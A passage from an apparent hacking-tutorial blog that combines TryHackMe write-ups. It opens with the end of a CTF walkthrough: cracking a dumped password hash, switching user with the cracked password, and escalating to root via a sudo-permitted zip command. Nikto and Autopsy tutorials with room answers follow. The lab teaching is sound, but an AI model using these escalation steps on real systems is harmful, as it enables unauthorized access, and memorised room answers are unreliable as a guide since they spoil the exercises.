bolt_cron               bolt_log_change         bolt_taxonomy         
bolt_entries            bolt_log_system         bolt_users            
sqlite> www.kumaratuljaiswal.in

  

The bolt_users table looks interesting, let's have a look at that:

SELECT * FROM bolt_users;

  
  
sqlite> SELECT * FROM bolt_users;   
SELECT * FROM bolt_users;
1|admin|$2y$10$0Z2xl2fs/9xe2HVEkqDZZ.COwXKfHtxsyT5qdHXuJB3XgR7TzeZQi||0|a@a.com|2021-05-26 05:47:53|192.168.100.1|[]|1|||||["root","everyone"]
2|wildone|$2y$10$ZZqbTKKlgDnCMvGD2M0SxeTS3GPSCljXWtd172lI2zj3p6bjOCGq.|Wile E Coyote|0|wild@one.com|2020-04-25 16:03:44|192.168.100.1|[]|1|||||["editor"]
sqlite> www.kumaratuljaiswal.in

  

Two users are listed - admin and wildone (Wile E Coyote). There is also an IP address of 192.168.100.1, which might come in handy later.

We're already admin, so let's try and crack the hash of wildone using JohnTheRipper and the rockyou wordlist.

First, copy the hash to a file and then run: 

we got it -

Once this completes, run the following to view the password, If the password is not visible


john --show hash.txt

This allows us to switch user to wileec and obtain the first flag:

Then, quit in sqlite -

.quit

change the user su wileec with password : snickers

This allows us to switch user to wileec and obtain the first flag:

  
sqlite> .quit
.quit
www-data@Erit:/var/www/html/app/database$ su wileec
su wileec
Password: snickers    

$ whoami
whoami
wileec
$ ls
ls
bolt.db
$ cd ~
cd ~
$ ls
ls
flag1.txt
$ cat flag1.txt
cat flag1.txt
THM{Hey!_Welcome_in}
$ 
                                                                                   
                                                                                   
                            
  

Pivoting

It appears that wileec also has an ssh private key:

ls -la
cd .ssh

  $ ls -la
ls -la
total 28
drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 25  2020 ..
-rw-r--r-- 1 wileec wileec  220 May 15  2017 .bash_logout
-rw-r--r-- 1 wileec wileec 3526 May 15  2017 .bashrc
-rw-r--r-- 1 wileec wileec  675 May 15  2017 .profile
drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .ssh
-rw-r--r-- 1 root   root     21 Apr 25  2020 flag1.txt
$ cd .ssh
cd .ssh
$ ls -la
ls -la
total 20
drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .
drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 ..
-rw------- 1 wileec wileec 1675 Apr 25  2020 id_rsa
-rw-r--r-- 1 wileec wileec  393 Apr 25  2020 id_rsa.pub
-rw-r--r-- 1 wileec wileec  222 Apr 25  2020 known_hosts
$ www.kumaratuljaiswal.in



  

We can use this to try connecting using the internal IP address we found in the bolt_users table of the SQLite database:

Great, it worked... and, even better, we have some sudo privileges:

sudo -l

Privilege Escalation #2

  $ sudo -l
sudo -l
Matching Defaults entries for wileec on Securus:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wileec may run the following commands on Securus:
    (jsmith) NOPASSWD: /usr/bin/zip
$ 

$ TF=$(mktemp -u)
TF=$(mktemp -u)
$ sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 32%)
$ 


  

Awesome! We are now jsmith.

Once again, we can upgrade to a fully interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

  
$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
jsmith@Securus:/home/wileec$ whoami
whoami
jsmith
jsmith@Securus:/home/wileec$ #www.kumaratuljaiswal.in
#www.kumaratuljaiswal.in
jsmith@Securus:/home/wileec$ cd ~
cd ~
jsmith@Securus:~$ ls -la
ls -la
total 24
drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
-rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
-rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
-rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
-rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
jsmith@Securus:~$ 

jsmith@Securus:~$ cat flag2.txt
cat flag2.txt
THM{Welcome_Home_Wile_E_Coyote!}
jsmith@Securus:~$ 
  

  jsmith@Securus:~$ sudo -l
sudo -l
Matching Defaults entries for jsmith on Securus:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jsmith may run the following commands on Securus:
    (ALL : ALL) NOPASSWD: ALL
jsmith@Securus:~$ 




  

Next, we can change to the users home directory and grab the second flag:

jsmith@Securus:~$ sudo su
sudo su
root@Securus:/home/jsmith# whoami
whoami
root
root@Securus:/home/jsmith# ls -la
ls -la
total 24
drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
-rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
-rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
-rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
-rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
root@Securus:/home/jsmith# #www.kumaratuljaiswal.in
#www.kumaratuljaiswal.in
root@Securus:/home/jsmith# 

root@Securus:/home/jsmith# cd /root
cd /root
root@Securus:~# ls -la
ls -la
total 28
drwx------  4 root root 4096 Apr 26  2020 .
drwxr-xr-x 22 root root 4096 Apr 17  2020 ..
lrwxrwxrwx  1 root root    9 Apr 22  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   43 Apr 25  2020 flag3.txt
drwx------  2 root root 4096 Apr 23  2020 .gnupg
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
drwx------  2 root root 4096 Apr 17  2020 .ssh
root@Securus:~# cat flag3.txt
cat flag3.txt
THM{Great_work!_You_pwned_Erit_Securus_1!}
root@Securus:~# 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Introduction to Nikto

Initially released in 2001, Nikto has made leaps and bounds over the years and has proven to be a very popular vulnerability scanner due to being both open-source nature and feature-rich. Nikto is capable of performing an assessment on all types of webservers (and isn't application-specific such as WPScan.). Nikto can be used to discover possible vulnerabilities including:

• Sensitive files
• Outdated servers and programs (i.e. vulnerable web server installs)
• Common server and software misconfigurations (Directory indexing, cgi scripts, x-ss protections)

Installing Nikto

Thankfully for us, Nikto comes pre-installed on the latest versions of penetration testing systems such as Kali Linux and Parrot. If you are using an older version of Kali Linux (such as 2019) for example, Nikto is in the apt repository, so can be installed by a simple sudo apt update && sudo apt install nikto

Installing Nikto on other operating systems such as Ubuntu or Debian involves extra steps. Whilst the TryHackMe AttackBox comes pre-installed with Nikto, you can follow the developer's installation guide for your local environment.Learn the methodology of enumerating websites by using tools

Nikto Modes

Basic Scanning

The most basic scan can be performed by using the -h flag and providing an IP address or domain name as an argument. This scan type will retrieve the headers advertised by the webserver or application (I.e. Apache2, Apache Tomcat, Jenkins or JBoss) and will look for any sensitive files or directories (i.e. login.php, /admin/, etc)

An example of this is the following: nikto -h vulnerable_ip

 

Note a few interesting things are given to us in this example:


Nikto has identified that the application is Apache Tomcat using the favicon and the presence of "/examples/servlets/index.html" which is the location for the default Apache Tomcat application.
HTTP Methods "PUT" and "DELETE" can be performed by clients - we may be able to leverage these to exploit the application by uploading or deleting files.


Scanning Multiple Hosts & Ports


Nikto is extensive in the sense that we can provide multiple arguments in a way that's similar to tools such as Nmap. In fact, so much so, we can take input directly from an Nmap scan to scan a host range. By scanning a subnet, we can look for hosts across an entire network range. We must instruct Nmap to output a scan into a format that is friendly for Nikto to read using Nmap's  -oG  flags


For example, we can scan 172.16.0.0/24 (subnet mask 255.255.255.0, resulting in 254 possible hosts) with Nmap (using the default web port of 80) and parse the output to Nikto like so: 

nmap -p80 172.16.0.0/24 -oG - | nikto -h -


There are not many circumstances where you would use this other than when you have gained access to a network. A much more common scenario will be scanning multiple ports on one specific host. We can do this by using the -p flag and providing a list of port numbers delimited by a comma - such as the following: 

nikto -h 10.10.10.1 -p 80,8000,8080

Introduction to Plugins

Plugins further extend the capabilities of Nikto. Using information gathered from our basic scans, we can pick and choose plugins that are appropriate to our target. You can use the --list-plugins flag with Nikto to list the plugins or view the whole list in an easier to read format online.

Some interesting plugins include:

We can specify the plugin we wish to use by using the -Plugin argument and the name of the plugin we wish to use...For example, to use the "apacheuser" plugin, our Nikto scan would look like so: nikto -h 10.10.10.1 -Plugin apacheuser

 

 
Verbosing our Scan

We can increase the verbosity of our Nikto scan by providing the following arguments with the -Display flag. Unless specified, the output given by Nikto is not the entire output, as it can sometimes be irrelevant (but that isn't always the case!)

Tuning Your Scan for Vulnerability Searching

Nikto has several categories of vulnerabilities that we can specify our scan to enumerate and test for. The following list is not extensive and only include the ones that you may commonly use. We can use the -Tuning flag and provide a value in our Nikto scan:

Saving Your Findings

Rather than working with the output on the terminal, we can instead, just dump it directly into a file for further analysis - making our lives much easier!


Nikto is capable of putting to a few file formats including:

•     Text File
•     HTML report

We can use the -o argument (short for -Output) and provide both a filename and compatible extension. We can specify the format (-f) specifically, but Nikto is smart enough to use the extension we provide in the -o argument to adjust the output accordingly.


For example, let's scan a web server and output this to "report.html": nikto -h http://ip_address -o report.html

 

 

 


1) What argument would we use if we wanted to scan port 80 and 8080 on a host?

Ans :- -p 80,8080



2) What argument would we use if we wanted to see any cookies given by the web server?

Ans :-  -Display 2

3) What is the name & version of the web server that  Nikto has determined running on port 80?

Ans :- Apache/2.4.7



4) There is another web server running on another port. What is the name & version of this web server?

Ans :- Apache-Coyote/1.1



5) What is the name of the Cookie that this JBoss server gives?

Ans :- JSESSIONID


 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Introduction

What is Autopsy?

The official description: "Autopsy is the premier open source forensics platform which is fast, easy-to-use, and capable of analyzing all types of mobile devices and digital media. Its plug-in architecture enables extensibility from community-developed or custom-built modules. Autopsy evolves to meet the needs of hundreds of thousands of professionals in law enforcement, national security, litigation support, and corporate investigation."

Autopsy is a powerful tool. Several features within Autopsy were developed thanks to the Department of Homeland Security Science and Technology funding. You can read more about this here.

Learn how to use Autopsy to investigate artifacts from a disk image. Use your knowledge to investigate an employee who is being accused of leaking private company data.TryHackme



This room's objective is to provide an overview of how to use the Autopsy tool to perform analysis on disk images and the assumption is that you are familiar with the Windows operating system and Windows artifacts in relation to forensics.

Installation

Installing Autopsy for Windows is pretty straightforward.


Visit the Autopsy download page and download the Windows MSI, which corresponds to your Windows architecture, 32bit or 64bit.

•     Run the Autopsy MSI file
•     If Windows prompts with User Account Control, click Yes
•     Click through the dialog boxes until you click a button that says Finish

Autopsy is also available for Linux and macOS. Follow the install instructions provided on the Autopsy website.

If you use Kali Linux, Autopsy is already installed.

Workflow Overview

Before diving into Autopsy and analyzing data, there are a few steps to perform, such as identifying the data source and what Autopsy actions to perform with the data source.



Your basic workflow:

•     Create the case for the data source you will investigate
•     Select the data source you wish to analyze
•     Configure the ingest modules to extract specific artifacts from the data source
•     Review the artifacts extracted by the ingest modules
•     Create the report

Below is a visual of step #1.


When you start Autopsy, there will be 3 options. To start a new case, click on New Case.

The next screen is titled Case Information, and this is where information about the case is populated.

• Case Name: The name you wish to give to the case
•  
• Base Directory: The root directory that will store all the files specific to the case (the full path will be displayed)
•  
  
• Case Type: Specify whether this case will be local (Single-user) or hosted on a server where multiple analysts can review (Multi-user)

Note: In this room, the focus is on Single-User.



The screen that follows is titled, Optional Information and it can be left blank for our purposes. In an actual forensic environment, you should fill out this information.  When you're done, click Finish.


In this room, you will import a case. To open a case, you will select is Open Case.

Autopsy case files have an .aut file extension. Navigate to the case folder and select the .aut file you wish to open. 

Next, Autopsy will process the case files open the case.

You can identify the name of the case at the top left corner of the Autopsy window. In the image below, the name of this case is Tryhackme.


 

 
Note: If Autopsy is unable to locate the disk image, a warning box will appear. At this point, you can point Autopsy to the location of the disk image it's attempting to find, or you can click NO; you can still analyze the data from the Autopsy case.

 
Once the case you wish to analyze is open, you are ready to start analyzing the data. 

1) Autopsy files end with which file extension?

Ans :- .aut

Data Sources

Before diving into analyzing the data, let's briefly cover the different data sources Autopsy can analyze.

Below is a screenshot of the Add Data Source Windows dialog box.

 


In this room, we will focus primarily on the first option, Disk Image or VM file.


Supported Disk Image Formats:

•     Raw Single (For example: *.img, *.dd, *.raw, *.bin)
•     Raw Split (For example: *.001, *.002, *.aa, *.ab, etc)
•     EnCase (For example: *.e01, *.e02, etc)
•     Virtual Machines (For example: *.vmdk, *.vhd)

If there are multiple image files (e.i. E01, E02, E03, etc.) Autopsy only needs you to point to the first image file, and Autopsy will handle the rest. 

Note: Refer to the Autopsy documentation to understand the other data sources that can be added to a case.

Below is a screenshot of an E01 disk image added to a sample case as a data source.

 

Specify the time zone and click Next.

Note: Orphan files are deleted files that no longer have a parent folder. In FAT file systems, it can be time-sensitive to read and analyze.


 
1) In the above screenshot, what is the disk image format for SUSPECTHD?

Ans :- Encase

Ingest Modules

Essentially Ingest Modules are Autopsy plug-ins. Each Ingest Module is designed to analyze and retrieve specific data from the drive.

Below is a screenshot of the Configure Ingest Modules window.

By default, the Ingest Modules are configured to run on All Files, Directories, and Unallocated Space.

 

The other two options are:

•     All Files and Directories (Not Unallocated Space)
•     Create/edit file ingest filters...

Note: We will not cover ingest filters in this room.


If all the Ingest Modules are deselected, and Next is selected, Autopsy will still process the data source and update the local database.

Note: Autopsy adds metadata about files to the local database, not the actual file contents.

When Autopsy is done, you will see the following:

To complete this process, click Finish.

In the below image, since the Ingest Modules were deselected, there aren't any results in the Results node.

 


The results of any Ingest Module you select to run against a data source will populate the Results node in the Tree view, which is the left pane of the Autopsy user interface.

You can run Ingest Modules at any time while the case is open. To do so, right-click on the data source and select Run Ingest Modules.

 
As Ingest Modules run, alerts may appear in the Ingest Inbox.

 


Below is an example of the Ingest Inbox after a few Ingest Modules have completed running. 

Drawing the attention back to the Configure Ingest Modules window, notice that some Ingest Modules have per-run settings and some do not.

For example, the Recent Activity Ingest Module does not have per-run settings. In contrast, the Hash Lookup Ingest Module does.


To learn more about Ingest Modules, read Autopsy documentation here.

The User Interface

Let's look at the Autopsy user interface, which is comprised of 5 primary areas:

•     Tree Viewer (Left pane)
•     Result Viewer (Top right pane)
•     Keyword Search (Upper Top Right)
•     Contents Viewer (Bottom right pane)
•     Status Area (Lower Bottom right)

Each area will be explained briefly below.

The Tree Viewer has 5 top-level nodes:

• Data Sources - all the data will be organized as you would typically see it in a normal Windows File Explorer. 
•  
• Views - files will be organized based on file types, MIME types, file size, etc. 
•  
• Results - as mentioned earlier, this is where the results from Ingest Modules will appear. 
•  
• Tags - will display files and/or results that have been tagged (read more about tagging here)
•  
• Reports - will display reports either generated by modules or the analyst. (read more about reporting here)

   
   

Refer to the Autopsy documentation on the Tree Viewer for more information here.




Result Viewer


Note: Don't confuse the Results node (from the Tree Viewer) with the Result Viewer.

When a volume, file, folder, etc., are selected from the Tree Viewer, additional information about the selected item is displayed in the Result Viewer.

For example, the Sample case's data source is selected, and now additional information is visible in the Results Viewer.

If a volume is selected, the Result Viewer's information will change to reflect the information in the local database for the selected volume.

Notice that the Result Viewer pane has 3 tabs: Table, Thumbnail, and Summary. The 2 above screenshots reflect the information displayed in the Table tab. 

The Thumbnail tab works best with image or video files. If the view of the above data is changed from Table to Thumbnail, not much information will be displayed. See below.

Volume nodes can be expanded, and an analyst can navigate the volume's contents, as they would a typical Windows system.

In the Views tree node, files are categorized by File Types - By Extension, By MIME Type, Deleted Files, and By File Size.

 

Tip: When it comes to File Types, pay attention to this section. An adversary can rename a file with a misleading file extension. So the file will be 'miscategorized' By Extension but will be categorized appropriately by MIME Type.

Expand By Extension and more children nodes appear, categorizing files even further (see below).

Refer to the Autopsy documentation on the Result Viewer for more information here.

Contents Viewer

From the Table tab in the Result Viewer, if you click any folder/file, additional information is displayed in the Contents Viewer pane.

In the above image, 3 columns might not be quickly understood what they represent.

    S = Score
   
   

The Score will show a red exclamation point for a folder/file marked/tagged as notable and a yellow triangle pointing downward for a folder/file that is marked/tagged as suspicious. These items can be marked/tagged by an Ingest Module or by the analyst.

    C = Comment
   
   

If a yellow page is visible in the Comment column, it will indicate that there is a comment for the folder/file.

    O = Occurrence
   
   

In a nutshell, this column will indicate how many times this file/folder has been seen in past cases (this will require the Central Repository)

Refer to the Autopsy documentation on the Contents Viewer for more information here.




Keyword Search

At the top right, you will find Keyword Lists and Keyword Search.

With Keyword Search, an analyst can perform an AD-HOC keyword search.

In the image above, the analyst is searching for the word 'secret.' Below are the search results.

Refer to the Autopsy documentation for more information on how to perform keyword searches with either option.


Status Area


Lastly, the Status Area is at the bottom right.

When Ingest Modules are running, a progress bar (along with the percentage completed) will be displayed in this area. If you click on the bar, more detailed information regarding the Ingest Modules is provided.


If the X (directly next to the progress bar) is clicked on, a prompt will appear confirming if you wish to end cancel the Ingest Modules.

Refer to the Autopsy documentation on the UI overview here.

Data Analysis

Case Scenario: An employee was suspected of leaking company data. A disk image was retrieved from the machine. You were assigned to perform the initial analysis. Further action will be determined based on the initial findings.

Reminder: Since the actual disk image is not in the attached VM, certain Autopsy sections will not display any actual data, only the metadata for that row within the local database. You can click No when you're notified about the 'Missing Image.' Additionally, you do not need to run any ingest modules in this exercise.







1) What is the full name of the operating system version?

Ans :- Windows 7 Ultimate Service Pack 1

2) What percentage of the drive are documents? Include the % in your answer.

Ans :- 40.8%

3) The majority of file events occurred on what date? (MONTH DD, YYYY)

Ans :- March 25, 2015

4) What is the name of an Installed Program with the version number of 6.2.0.2962?

Ans :- Eraser
 

5) A user has a Password Hint. What is the value?

Ans :- IAMAN

6) Numerous SECRET files were accessed from a network drive. What was the IP address?

Ans :- 10.11.11.128

7) What web search term has the most entries?

Ans :- information leakage cases
 

8) What was the web search conducted on 3/25/2015 21:46:44?

Ans :- anti-forensic tools

9) What binary is listed as an Interesting File?

Ans :- googledrivesync.exe

10) What self-assuring message did the 'Informant' write for himself on a Sticky Note? (no spaces)


Ans :-  Tomorrow...everything will be ok..

Visualization Tools

You may have noticed that other parts of the user interface weren't discussed as of yet.


Please refer to the Autopsy documentation for the following visualization tool:

 

• Images/Videos - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/image_gallery_page.html
   
• Communications - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/communications_page.html
   
• Timeline - http://sleuthkit.org/autopsy/docs/user-docs/4.12.0/timeline_page.html
•     

Note: Within the attached VM, you will NOT be able to practice with some of the visualization tools, except for Timeline.

Below is a screenshot of the Timeline.

The Timeline tool is composed of 3 areas:

• Filters - narrow the events displayed based on the filter criteria
• Events - the events are displayed here based on the View Mode
• Files/Contents - additional information on the event(s) is displayed in this area   

   
   

There are 3 view modes:

• Counts -  the number of events is displayed in a bar chart view
• Details - information on events is displayed, but they are clustered and collapsed, so the UI is not overloaded
• List - the events are displayed in a table view

In the above screenshot, the View Mode is Counts. Below is a screenshot of the Details View Mode.

The numbers (seen above) indicate the number of clustered/collapsed events for a specific time frame.

For example, for /Windows, there are 130,257 events between 2009-06-10 and 2010-03-18. See the below image.

To expand a cluster, click on the green icon with the plus sign. See the below example.

To collapse the events, click on the red icon with a minus sign.

Click the map marker icon with a plus sign if you wish to pin a group of events. This will move (pin) the events to an isolated section of the Events view.

To unpin the events, click on the map marker with the minus sign.

The last group of icons to cover are the eye icons. If you wish to hide a group of events from the Events view, click on the eye with a minus sign.

In the below screenshot, the clustered events for /Boot were hidden and were placed in Hidden Descriptions (in the Filters area).

 

 

Last but not least, below is a screenshot of the List View Mode.

This should be enough information to get you started interacting with the Timeline with some level of confidence.


1) Using the Timeline, how many results were there on 2015-01-12?

Ans :- 46

Conclusion

To conclude, there is more to Autopsy that wasn't covered in detail within this room.

Below are some topics that you should explore on your own to configure Autopsy to do more out of the box:

• Global Hash Lookup Settings
• Global File Extension Mismatch Identification Settings
• Global Keyword Search Settings
• Global Interesting Items Settings
• Yara Analyzer
•    

3rd Party modules are available for Autopsy. Visit the official SleuthKit GitHub repo for a list of 3rd party modules here.


The disk image used with this room's development was created and released by the NIST under the Computer Forensic Reference Data Sets (CFReDS) Project. It is encouraged to download the disk image, go through the full exercise (here) to practice using Autopsy, and level up your investigation techniques.

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)